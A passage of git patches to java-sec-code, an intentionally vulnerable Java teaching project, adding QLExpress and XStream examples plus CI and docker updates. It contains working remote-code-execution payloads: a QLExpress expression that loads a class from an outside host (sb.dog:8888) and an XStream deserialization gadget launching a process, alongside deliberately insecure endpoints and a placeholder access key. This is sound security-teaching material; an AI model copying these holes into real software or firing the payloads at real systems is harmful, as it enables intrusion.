diff --git a/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java b/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
index ec054ffd..d3107c3e 100644
--- a/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
+++ b/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
@@ -1,7 +1,6 @@
 package org.joychou.controller.othervulns;
 
 import com.monitorjbl.xlsx.StreamingReader;
-import org.apache.poi.ss.usermodel.Workbook;
 
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.GetMapping;
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index ee962846..fef14593 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -18,7 +18,7 @@
 public class SecurityUtil {
 
     private static final Pattern FILTER_PATTERN = Pattern.compile("^[a-zA-Z0-9_/\\.-]+$");
-    private static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
+    private final static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
 
 
     /**
@@ -116,7 +116,6 @@ public static boolean checkSSRFByWhitehosts(String url) {
 
     /**
      * 解析URL的IP，判断IP是否是内网IP。如果有重定向跳转，循环解析重定向跳转的IP。不建议使用该方案。
-     *
      * 存在的问题：
      *   1、会主动发起请求，可能会有性能问题
      *   2、设置重定向跳转为第一次302不跳转，第二次302跳转到内网IP 即可绕过该防御方案
@@ -134,7 +133,6 @@ public static boolean checkSSRF(String url) {
 
     /**
      * 不能使用白名单的情况下建议使用该方案。前提是禁用重定向并且TTL默认不为0。
-     *
      * 存在问题：
      *  1、TTL为0会被绕过
      *  2、使用重定向可绕过
diff --git a/src/main/java/org/joychou/util/CookieUtils.java b/src/main/java/org/joychou/util/CookieUtils.java
index eddae0db..f63b6e42 100644
--- a/src/main/java/org/joychou/util/CookieUtils.java
+++ b/src/main/java/org/joychou/util/CookieUtils.java
@@ -21,4 +21,17 @@ public static boolean deleteCookie(HttpServletResponse res, String cookieName) {
             return false;
         }
     }
+
+    public static boolean addCookie(HttpServletResponse res, String cookieName, String cookieValue) {
+        try {
+            Cookie cookie = new Cookie(cookieName, cookieValue);
+            cookie.setMaxAge(1000);
+            cookie.setPath("/");
+            res.addCookie(cookie);
+            return true;
+        } catch (Exception e) {
+            log.error(e.toString());
+            return false;
+        }
+    }
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 66bdb978..15d2c5a3 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -46,7 +46,7 @@ swagger.enable = true
 
 
 ### no need to login page begins ###
-joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**
+joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**, /shiro/**, /ssrf/**, /spel/**
 ### no need to login page ends ###
 
 
@@ -54,5 +54,6 @@ joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**,
 # http header max size
 #server.max-http-header-size=30000
 
+# Fake aksk. Simulate actuator info leak.
 jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
 jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
\ No newline at end of file
diff --git a/src/main/resources/templates/login.html b/src/main/resources/templates/login.html
index 1a4c4225..d5c4ccd5 100644
--- a/src/main/resources/templates/login.html
+++ b/src/main/resources/templates/login.html
@@ -28,7 +28,9 @@
     <div class="form">
         <input type="text" placeholder="Username" name="username" required="required"/>
         <input type="password" placeholder="Password" name="password" required="required"/>
-        <p><input type="checkbox" name="remember-me" checked="checked"/>RememberMe</p>
+        <p style="line-height: 1; margin: 0;">
+            <input type="checkbox" name="remember-me" style="vertical-align: top;" checked="checked"/>RememberMe
+        </p>
         <button onclick="login()">Login</button>
     </div>
 </div>

From 457d703e8f89bff657c6c51151ada71ebd09a1c6 Mon Sep 17 00:00:00 2001
From: JoyChou <root@joychou.org>
Date: Thu, 28 Dec 2023 19:38:47 +0800
Subject: [PATCH 098/108] Add qlexpress and some test cases.

---
 README.md                                     |   5 +-
 README_zh.md                                  |   5 +-
 .../org/joychou/controller/QLExpress.java     |  44 ++++++++
 .../org/joychou/controller/XStreamRce.java    |  14 +--
 src/main/java/org/joychou/dao/User.java       |  29 +----
 src/main/resources/application.properties     |   2 +-
 src/main/test/org/test/QLExpressTest.java     | 103 ++++++++++++++++++
 src/main/test/org/test/XStreamTest.java       |  70 ++++++++++++
 8 files changed, 230 insertions(+), 42 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/QLExpress.java
 create mode 100644 src/main/test/org/test/QLExpressTest.java
 create mode 100644 src/main/test/org/test/XStreamTest.java

diff --git a/README.md b/README.md
index e7fbef9e..0e8c074b 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 
 Java sec code is a very powerful and friendly project for learning Java vulnerability code.
 
-[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md) 😋[Alibaba Security Purple Team Recruitment](https://talent.alibaba.com/off-campus-position/937731?trace=qrcode_share)
+[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md) 😋
 
 ## Introduce
 
@@ -41,6 +41,7 @@ Sort by letter.
 - [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
+- [QLExpress](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/QLExpress.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
   - Runtime
   - ProcessBuilder
@@ -146,7 +147,7 @@ Viarus
 Example:
 
 ```
-http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
+http://localhost:8080/java-sec-code-1.0.0/rce/runtime/exec?cmd=whoami
 ```
 
 return:
diff --git a/README_zh.md b/README_zh.md
index f713e6cc..e2d5727c 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -2,7 +2,7 @@
 
 对于学习Java漏洞代码来说，`Java Sec Code`是一个非常强大且友好的项目。
 
-[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋[阿里集团安全紫军招聘](https://talent.alibaba.com/off-campus-position/937731?trace=qrcode_share)
+[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋
 
 ## 介绍
 
@@ -36,6 +36,7 @@ joychou/joychou123
 - [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
+- [QLExpress](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/QLExpress.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
     - Runtime
     - ProcessBuilder  
@@ -138,7 +139,7 @@ Viarus
 例子：
 
 ```
-http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
+http://localhost:8080/java-sec-code-1.0.0/rce/runtime/exec?cmd=whoami
 ```
  
 返回：
diff --git a/src/main/java/org/joychou/controller/QLExpress.java b/src/main/java/org/joychou/controller/QLExpress.java
new file mode 100644
index 00000000..663589cd
--- /dev/null
+++ b/src/main/java/org/joychou/controller/QLExpress.java
@@ -0,0 +1,44 @@
+package org.joychou.controller;
+
+import com.ql.util.express.DefaultContext;
+import com.ql.util.express.ExpressRunner;
+import com.ql.util.express.config.QLExpressRunStrategy;
+import org.joychou.util.WebUtils;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.http.HttpServletRequest;
+
+@RestController(value = "/qlexpress")
+public class QLExpress {
+
+    /**
+     * url = 'http://sb.dog:8888/';
+     * classLoader = new java.net.URLClassLoader([new java.net.URL(url)]);
+     * classLoader.loadClass('Hello').newInstance();
+     */
+    @RequestMapping("/vuln1")
+    public String vuln1(HttpServletRequest req) throws Exception{
+        String express = WebUtils.getRequestBody(req);
+        System.out.println(express);
+        ExpressRunner runner = new ExpressRunner();
+        DefaultContext<String, Object> context = new DefaultContext<String, Object>();
+        Object r = runner.execute(express, context, null, true, false);
+        System.out.println(r);
+        return r.toString();
+    }
+
+    @RequestMapping("/sec")
+    public String sec(HttpServletRequest req) throws Exception{
+        String express = WebUtils.getRequestBody(req);
+        System.out.println(express);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true);
+        // Can only call java.lang.String#length()
+        QLExpressRunStrategy.addSecureMethod(String.class, "length");
+        DefaultContext<String, Object> context = new DefaultContext<String, Object>();
+        Object r = runner.execute(express, context, null, true, false);
+        System.out.println(r);
+        return r.toString();
+    }
+}
diff --git a/src/main/java/org/joychou/controller/XStreamRce.java b/src/main/java/org/joychou/controller/XStreamRce.java
index 62616e95..aa3469bd 100644
--- a/src/main/java/org/joychou/controller/XStreamRce.java
+++ b/src/main/java/org/joychou/controller/XStreamRce.java
@@ -2,6 +2,7 @@
 
 import com.thoughtworks.xstream.XStream;
 import com.thoughtworks.xstream.io.xml.DomDriver;
+import com.thoughtworks.xstream.security.AnyTypePermission;
 import org.joychou.dao.User;
 import org.joychou.util.WebUtils;
 import org.springframework.web.bind.annotation.PostMapping;
@@ -24,20 +25,9 @@ public class XStreamRce {
     public String parseXml(HttpServletRequest request) throws Exception {
         String xml = WebUtils.getRequestBody(request);
         XStream xstream = new XStream(new DomDriver());
+        xstream.addPermission(AnyTypePermission.ANY); // This will cause all XStream versions to be affected.
         xstream.fromXML(xml);
         return "xstream";
     }
 
-    public static void main(String[] args) {
-        User user = new User();
-        user.setId(0);
-        user.setUsername("admin");
-
-        XStream xstream = new XStream(new DomDriver());
-        String xml = xstream.toXML(user); // Serialize
-        System.out.println(xml);
-
-        user = (User) xstream.fromXML(xml); // Deserialize
-        System.out.println(user.getId() + ": " + user.getUsername());
-    }
 }
diff --git a/src/main/java/org/joychou/dao/User.java b/src/main/java/org/joychou/dao/User.java
index 1336f571..0b8eb3b0 100644
--- a/src/main/java/org/joychou/dao/User.java
+++ b/src/main/java/org/joychou/dao/User.java
@@ -1,32 +1,11 @@
 package org.joychou.dao;
 
-import java.io.Serializable;
+import lombok.Data;
 
-public class User implements Serializable {
-    private static final long serialVersionUID = 1L;
+
+@Data
+public class User {
     private Integer id;
     private String username;
     private String password;
-
-    public Integer getId() {
-        return id;
-    }
-    public void setId(Integer id) {
-        this.id = id;
-    }
-
-    public String getUsername() {
-        return username;
-    }
-    public void setUsername(String username) {
-        this.username = username;
-    }
-
-    public String getPassword() {
-        return password;
-    }
-    public void setPassword(String password) {
-        this.password = password;
-    }
-
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 15d2c5a3..326a2b76 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -46,7 +46,7 @@ swagger.enable = true
 
 
 ### no need to login page begins ###
-joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**, /shiro/**, /ssrf/**, /spel/**
+joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**, /shiro/**, /ssrf/**, /spel/**, /qlexpress/**
 ### no need to login page ends ###
 
 
diff --git a/src/main/test/org/test/QLExpressTest.java b/src/main/test/org/test/QLExpressTest.java
new file mode 100644
index 00000000..a2071d58
--- /dev/null
+++ b/src/main/test/org/test/QLExpressTest.java
@@ -0,0 +1,103 @@
+package org.test;
+
+import com.ql.util.express.DefaultContext;
+import com.ql.util.express.ExpressRunner;
+import com.ql.util.express.IExpressContext;
+import com.ql.util.express.config.QLExpressRunStrategy;
+import org.junit.Test;
+
+/**
+ * <a href="https://github.com/alibaba/QLExpress">QLExpress</a> security test cases.
+ */
+public class QLExpressTest {
+
+    private static final String poc = "url = 'http://sb.dog:8888/'; classLoader = new java.net.URLClassLoader([new java.net.URL(url)]);classLoader.loadClass('Hello').newInstance();";
+
+    /**
+     * basic usage
+     */
+    @Test
+    public void basicUsage() throws Exception{
+        ExpressRunner runner = new ExpressRunner();
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        context.put("a", 1);
+        context.put("b", 2);
+        Object r = runner.execute("a+b", context, null, true, false);
+        System.out.println(r);  // print 3
+    }
+
+    /**
+     * Test case of /qlexpress/vuln1. Use URLClassLoader to load evil class.
+     */
+    @Test
+    public void vuln1() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r = runner.execute(poc, context, null, true, false);
+        System.out.println(r);
+    }
+
+    /**
+     * fix method by using class and method whitelist.
+     */
+    @Test
+    public void sec01() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true);
+        QLExpressRunStrategy.addSecureMethod(String.class, "length");
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r1 = runner.execute("'abc'.length()", context, null, true, false);
+        System.out.println(r1);
+        Object r2 = runner.execute(poc, context, null, true, false);
+        System.out.println(r2);
+    }
+
+    /**
+     * <p>Fix method by using class and method blacklist. It may exist bypass. </p>
+     *
+     * <p>Default blacklist:
+     *  <ul>
+     *     <li>System.class.getName() + ".exit"</li>
+     *     <li>ProcessBuilder.class.getName() + ".start"</li>
+     *     <li>Method.class.getName() + ".invoke"</li>
+     *     <li>Class.class.getName() + ".forName"</li>
+     *     <li>ClassLoader.class.getName() + ".loadClass"</li>
+     *     <li>ClassLoader.class.getName() + ".findClass"</li>
+     *     <li>ClassLoader.class.getName() + ".defineClass"</li>
+     *     <li>ClassLoader.class.getName() + ".getSystemClassLoader"</li>
+     *     <li>javax.naming.InitialContext.lookup</li>
+     *     <li>com.sun.rowset.JdbcRowSetImpl.setDataSourceName</li>
+     *     <li>com.sun.rowset.JdbcRowSetImpl.setAutoCommit</li>
+     *     <li>QLExpressRunStrategy.class.getName() + ".setForbidInvokeSecurityRiskMethods"</li>
+     *     <li>jdk.jshell.JShell.create</li>
+     *     <li>javax.script.ScriptEngineManager.getEngineByName</li>
+     *     <li>org.springframework.jndi.JndiLocatorDelegate.lookup</li>
+     *  </ul>
+     * </p>
+     */
+    @Test
+    public void sec02() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true);
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r = runner.execute(poc, context, null, true, false);
+        System.out.println(r);
+    }
+
+
+    /**
+     * <p>Fix method by using sandbox. </p>
+     */
+    @Test
+    public void sec03() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setSandBoxMode(true);
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r = runner.execute(poc, context, null, true, false);
+        System.out.println(r);
+    }
+}
diff --git a/src/main/test/org/test/XStreamTest.java b/src/main/test/org/test/XStreamTest.java
new file mode 100644
index 00000000..a5375ebf
--- /dev/null
+++ b/src/main/test/org/test/XStreamTest.java
@@ -0,0 +1,70 @@
+package org.test;
+
+import com.thoughtworks.xstream.XStream;
+import com.thoughtworks.xstream.io.xml.DomDriver;
+import com.thoughtworks.xstream.security.AnyTypePermission;
+import org.joychou.dao.User;
+import org.junit.Test;
+
+public class XStreamTest {
+
+    private static final String poc_xml = "<sorted-set>\n" +
+            "    <string>foo</string>\n" +
+            "    <dynamic-proxy>\n" +
+            "        <interface>java.lang.Comparable</interface>\n" +
+            "        <handler class=\"java.beans.EventHandler\">\n" +
+            "            <target class=\"java.lang.ProcessBuilder\">\n" +
+            "                <command>\n" +
+            "                    <string>Open</string>\n" +
+            "                    <string>-a</string>\n" +
+            "                    <string>Calculator</string>\n" +
+            "                </command>\n" +
+            "            </target>\n" +
+            "            <action>start</action>\n" +
+            "        </handler>\n" +
+            "    </dynamic-proxy>\n" +
+            "</sorted-set>";
+
+
+    /**
+     * XStream basic usage.
+     */
+    @Test
+    public void basicUsage() {
+        User user = new User();
+        user.setId(0);
+        user.setUsername("admin");
+
+        XStream xstream = new XStream(new DomDriver());
+        String xml = xstream.toXML(user); // Serialize
+        System.out.println(xml);
+
+        // High version xstream needs set allowTypes
+        xstream.allowTypes(new Class[]{User.class});
+        user = (User) xstream.fromXML(xml); // Deserialize
+        System.out.println(user.getId() + ": " + user.getUsername());
+    }
+
+    /**
+     * Command execute
+     */
+    @Test
+    public void vuln01() {
+        System.out.println(poc_xml);
+        XStream xstream = new XStream();
+        xstream.addPermission(AnyTypePermission.ANY); // Insecure configuration
+        xstream.fromXML(poc_xml); // Deserialize
+    }
+
+
+    /**
+     * Security code. XStream version: 1.4.20
+     */
+    @Test
+    public void sec01() {
+        System.out.println(poc_xml);
+        XStream xstream = new XStream();
+        xstream.fromXML(poc_xml); // Deserialize
+    }
+
+}

From 1d06b16c2a7acac439783e89e1882f82904edc9d Mon Sep 17 00:00:00 2001
From: JoyChou <root@joychou.org>
Date: Fri, 28 Jun 2024 09:48:48 +0800
Subject: [PATCH 099/108] Add alibaba recruitment.

---
 README.md    | 10 ++--------
 README_zh.md | 13 ++++++-------
 2 files changed, 8 insertions(+), 15 deletions(-)

diff --git a/README.md b/README.md
index 0e8c074b..a6b30f4d 100644
--- a/README.md
+++ b/README.md
@@ -205,12 +205,6 @@ Core developers : [JoyChou](https://github.com/JoyChou93), [liergou9981](https:/
 Other developers: [lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95), [waderwu](https://github.com/waderwu). 
 
 
-## Donate
+## Support
 
-If you like the poject, you can donate to support me. With your support, I will be able to make `Java sec code` better 😎.
-
-### Alipay
-
-Scan the QRcode to support `Java sec code`.
-
-<img title="Alipay QRcode" src="https://aliyun-testaaa.oss-cn-shanghai.aliyuncs.com/alipay_qr.png" width="200">
+If you like the poject, you can star java-sec-code project to support me. With your support, I will be able to make `Java sec code` better 😎.
diff --git a/README_zh.md b/README_zh.md
index e2d5727c..b5c658c3 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -4,6 +4,10 @@
 
 [英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋
 
+## 招聘
+
+[Alibaba招聘-安全攻防/研究（P5-P7）](https://github.com/JoyChou93/java-sec-code/wiki/Alibaba-Purple-Team-Job-Description)
+
 ## 介绍
 
 该项目也可以叫做Java Vulnerability Code(Java漏洞代码)。
@@ -195,12 +199,7 @@ Tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会
 
 核心开发者： [JoyChou](https://github.com/JoyChou93).其他开发者：[lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95)。欢迎各位提交PR。
 
-## 捐赠
-
-如果你喜欢这个项目，你可以捐款来支持我。 有了你的支持，我将能够更好地制作`Java sec code`项目。
-
-### Alipay
+## 支持
 
-扫描支付宝二维码支持`Java sec code`。
+如果你喜欢这个项目，你可以star该项目支持我。 有了你的支持，我将能够更好地制作`Java sec code`项目。
 
-<img title="Alipay QRcode" src="https://aliyun-testaaa.oss-cn-shanghai.aliyuncs.com/alipay_qr.png" width="200">

From 4711f4e186258c6e0dd5c3863e7c9592e7e9026a Mon Sep 17 00:00:00 2001
From: JoyChou <root@joychou.org>
Date: Fri, 28 Jun 2024 09:52:04 +0800
Subject: [PATCH 100/108] Add alibaba recruitment.

---
 README.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/README.md b/README.md
index a6b30f4d..c1f2eb91 100644
--- a/README.md
+++ b/README.md
@@ -5,6 +5,11 @@ Java sec code is a very powerful and friendly project for learning Java vulnerab
 
 [中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md) 😋
 
+## Recruitment
+
+[Alibaba-Security attack and defense/research（P5-P7）](https://github.com/JoyChou93/java-sec-code/wiki/Alibaba-Purple-Team-Job-Description)
+
+
 ## Introduce
 
 This project can also be called Java vulnerability code. 

From 9eb8d698fb55c9c5ee34bfcaf8d78ed80235324f Mon Sep 17 00:00:00 2001
From: autumn0914 <53305303+autumn0914@users.noreply.github.com>
Date: Thu, 10 Apr 2025 15:36:55 +0800
Subject: [PATCH 101/108] Set up CI with Azure Pipelines

[skip ci]
---
 azure-pipelines.yml | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100644 azure-pipelines.yml

diff --git a/azure-pipelines.yml b/azure-pipelines.yml
new file mode 100644
index 00000000..554903fc
--- /dev/null
+++ b/azure-pipelines.yml
@@ -0,0 +1,16 @@
+# Starter pipeline
+# Start with a minimal pipeline that you can customize to build and deploy your code.
+# Add steps that build, run tests, deploy, and more:
+# https://aka.ms/yaml
+
+trigger:
+- main
+
+pool: Default
+
+jobs:
+- job: BAC
+  steps:
+  - script: cov-capture --dir idir --source-dir .
+  - script: cov-analyze --dir idir --all
+  - script: cov-commit-defects --dir idir --url https://coverity.field-test.blackduck.com --auth-key-file C:/Test/auth-key.txt --stream java-pipe-ryan
\ No newline at end of file

From bdd032c19a72e2340029e6f6b3e27819577fcb1a Mon Sep 17 00:00:00 2001
From: autumn0914 <53305303+autumn0914@users.noreply.github.com>
Date: Thu, 10 Apr 2025 16:16:30 +0800
Subject: [PATCH 102/108] Update azure-pipelines.yml for Azure Pipelines

---
 azure-pipelines.yml | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/azure-pipelines.yml b/azure-pipelines.yml
index 554903fc..b6210e8e 100644
--- a/azure-pipelines.yml
+++ b/azure-pipelines.yml
@@ -13,4 +13,9 @@ jobs:
   steps:
   - script: cov-capture --dir idir --source-dir .
   - script: cov-analyze --dir idir --all
-  - script: cov-commit-defects --dir idir --url https://coverity.field-test.blackduck.com --auth-key-file C:/Test/auth-key.txt --stream java-pipe-ryan
\ No newline at end of file
+  - script: cov-commit-defects --dir idir --url https://coverity.field-test.blackduck.com --auth-key-file C:/Test/auth-key.txt --stream java-pipe-ryan
+  - task: PublishBuildArtifacts@1
+    displayName: 'Publish SARIF Report'
+    inputs:
+      PathtoPublish: 'coverity-report.sarif'
+      ArtifactName: CodeAnalysisLogs
\ No newline at end of file

From 02d614153914d13d58f783fe1f642099c4bf1247 Mon Sep 17 00:00:00 2001
From: autumn0914 <53305303+autumn0914@users.noreply.github.com>
Date: Thu, 10 Apr 2025 16:22:56 +0800
Subject: [PATCH 103/108] Update azure-pipelines.yml for Azure Pipelines

---
 azure-pipelines.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/azure-pipelines.yml b/azure-pipelines.yml
index b6210e8e..d80d155b 100644
--- a/azure-pipelines.yml
+++ b/azure-pipelines.yml
@@ -17,5 +17,5 @@ jobs:
   - task: PublishBuildArtifacts@1
     displayName: 'Publish SARIF Report'
     inputs:
-      PathtoPublish: 'coverity-report.sarif'
+      PathtoPublish: 'issue-report.sarif'
       ArtifactName: CodeAnalysisLogs
\ No newline at end of file

From 18cdd33c587a671622f37c004ef8c1196a4b73dd Mon Sep 17 00:00:00 2001
From: autumn0914 <53305303+autumn0914@users.noreply.github.com>
Date: Thu, 10 Apr 2025 17:41:31 +0800
Subject: [PATCH 104/108] Update azure-pipelines.yml for Azure Pipelines

---
 azure-pipelines.yml | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/azure-pipelines.yml b/azure-pipelines.yml
index d80d155b..b1ec290d 100644
--- a/azure-pipelines.yml
+++ b/azure-pipelines.yml
@@ -7,6 +7,9 @@ trigger:
 - main
 
 pool: Default
+variables:
+  - name: COVERITY_TOOL_HOME
+    value: C:\Test\cov-analysis-win64-2024.9.1
 
 jobs:
 - job: BAC
@@ -14,6 +17,12 @@ jobs:
   - script: cov-capture --dir idir --source-dir .
   - script: cov-analyze --dir idir --all
   - script: cov-commit-defects --dir idir --url https://coverity.field-test.blackduck.com --auth-key-file C:/Test/auth-key.txt --stream java-pipe-ryan
+- job: SARIF
+  dependsOn: BAC
+  steps:
+  - script: cov-format-errors --dir idir --json-output-v10 issues.json
+  - script: $COVERITY_TOOL_HOME\node\node.exe $COVERITY_TOOL_HOME\SARIF\cov-format-sarif-for-github.js --inputFile issues.json --outputFile issue-report.sarif --githubUrl https://github.com --repoName autumn0914/java-sec-code-demo --checkoutPath autumn0914/java-sec-code-demo . 033dbbad71a9d2923ac6cca7b3c62e8d4aa1e5ef
+  - script: tar -a -c -f  CodeAnalysisLogs.zip issue-report.sarif
   - task: PublishBuildArtifacts@1
     displayName: 'Publish SARIF Report'
     inputs:

From 048cee5e74dacb366e67088dc96bf0bb215f38f2 Mon Sep 17 00:00:00 2001
From: autumn0914 <53305303+autumn0914@users.noreply.github.com>
Date: Thu, 10 Apr 2025 17:48:19 +0800
Subject: [PATCH 105/108] Update azure-pipelines.yml for Azure Pipelines

---
 azure-pipelines.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/azure-pipelines.yml b/azure-pipelines.yml
index b1ec290d..2a034720 100644
--- a/azure-pipelines.yml
+++ b/azure-pipelines.yml
@@ -12,14 +12,14 @@ variables:
     value: C:\Test\cov-analysis-win64-2024.9.1
 
 jobs:
-- job: BAC
+- job: BAC_SARIF
   steps:
   - script: cov-capture --dir idir --source-dir .
   - script: cov-analyze --dir idir --all
   - script: cov-commit-defects --dir idir --url https://coverity.field-test.blackduck.com --auth-key-file C:/Test/auth-key.txt --stream java-pipe-ryan
-- job: SARIF
-  dependsOn: BAC
-  steps:
+#- job: SARIF
+#  dependsOn: BAC
+#  steps:
   - script: cov-format-errors --dir idir --json-output-v10 issues.json
   - script: $COVERITY_TOOL_HOME\node\node.exe $COVERITY_TOOL_HOME\SARIF\cov-format-sarif-for-github.js --inputFile issues.json --outputFile issue-report.sarif --githubUrl https://github.com --repoName autumn0914/java-sec-code-demo --checkoutPath autumn0914/java-sec-code-demo . 033dbbad71a9d2923ac6cca7b3c62e8d4aa1e5ef
   - script: tar -a -c -f  CodeAnalysisLogs.zip issue-report.sarif

From 5511840310a0d7083bb03099e6a446955fe93d1a Mon Sep 17 00:00:00 2001
From: autumn0914 <53305303+autumn0914@users.noreply.github.com>
Date: Thu, 10 Apr 2025 18:00:27 +0800
Subject: [PATCH 106/108] Update azure-pipelines.yml for Azure Pipelines

---
 azure-pipelines.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/azure-pipelines.yml b/azure-pipelines.yml
index 2a034720..55c46e06 100644
--- a/azure-pipelines.yml
+++ b/azure-pipelines.yml
@@ -21,7 +21,7 @@ jobs:
 #  dependsOn: BAC
 #  steps:
   - script: cov-format-errors --dir idir --json-output-v10 issues.json
-  - script: $COVERITY_TOOL_HOME\node\node.exe $COVERITY_TOOL_HOME\SARIF\cov-format-sarif-for-github.js --inputFile issues.json --outputFile issue-report.sarif --githubUrl https://github.com --repoName autumn0914/java-sec-code-demo --checkoutPath autumn0914/java-sec-code-demo . 033dbbad71a9d2923ac6cca7b3c62e8d4aa1e5ef
+  - script: C:\Test\cov-analysis-win64-2024.9.1\node\node.exe C:\Test\cov-analysis-win64-2024.9.1\SARIF\cov-format-sarif-for-github.js --inputFile issues.json --outputFile issue-report.sarif --githubUrl https://github.com --repoName autumn0914/java-sec-code-demo --checkoutPath autumn0914/java-sec-code-demo . 033dbbad71a9d2923ac6cca7b3c62e8d4aa1e5ef
   - script: tar -a -c -f  CodeAnalysisLogs.zip issue-report.sarif
   - task: PublishBuildArtifacts@1
     displayName: 'Publish SARIF Report'

From d16e5fc3f09cd202c8200f5ec45b74b400be42f6 Mon Sep 17 00:00:00 2001
From: ryanx <autumn0914@hotmail.com>
Date: Thu, 10 Apr 2025 19:03:23 +0800
Subject: [PATCH 107/108] mysql fix

---
 docker-compose.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docker-compose.yml b/docker-compose.yml
index 7e9c878e..e624c4be 100644
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -10,6 +10,6 @@ services:
             - j_mysql
 
     j_mysql:
-        image: joychou/jsc_mysql:latest
+        image: joychou/jsc_mysql:8.4.2
         ports:
             - "3306:3306"

From 1722b027b7ab1236418481ffa44d4890fda6f733 Mon Sep 17 00:00:00 2001
From: ryanx <autumn0914@hotmail.com>
Date: Thu, 10 Apr 2025 19:21:12 +0800
Subject: [PATCH 108/108] mysql fix

---
 docker-compose.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docker-compose.yml b/docker-compose.yml
index e624c4be..643c7e04 100644
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -10,6 +10,6 @@ services:
             - j_mysql
 
     j_mysql:
-        image: joychou/jsc_mysql:8.4.2
+        image: joychou/jsc_mysql:8.4.3
         ports:
             - "3306:3306"